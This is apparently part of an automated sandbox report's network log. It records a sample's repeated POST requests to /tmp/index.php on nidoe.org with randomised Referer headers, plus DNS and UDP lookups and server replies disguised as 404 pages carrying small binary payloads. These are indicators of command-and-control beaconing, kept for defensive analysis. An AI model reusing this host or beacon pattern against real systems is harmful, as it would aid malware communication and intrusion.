Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lyvgfxwmddcnfb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qipuwsetjdsly.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sitrlilwixmijdwa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lkfxkpohfrqcuf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ymaqoerhmbiko.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lifcehnnpyaunk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bmvswhlxjuxjpf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://chqvujyrjfo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jldhvcofgpoohdqq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dpmkxcqjquv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vxtsdxtdlktwbdnl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://abowpkrstiub.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tboygovgxqdbv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ovkuafudign.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xbqpttmfpoa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rskpmxlavjxbjtbs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hphdpqnonfmpdqxq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qakjjulmdxb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jljckibghorwl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ypaypqoyqmujr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xqmcfngarfr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://crqwqadvlmh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ibixnemdysifgd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://owewxdswvpurak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oykcjyefevftfd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ybjmbdiflbije.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uwbpryoiwnr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oycdwmonhjrtmcya.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iscsxhjipsydnvm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: nidoe.org

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: nidoe.org

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkexntmwarsh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: nidoe.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 8d Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
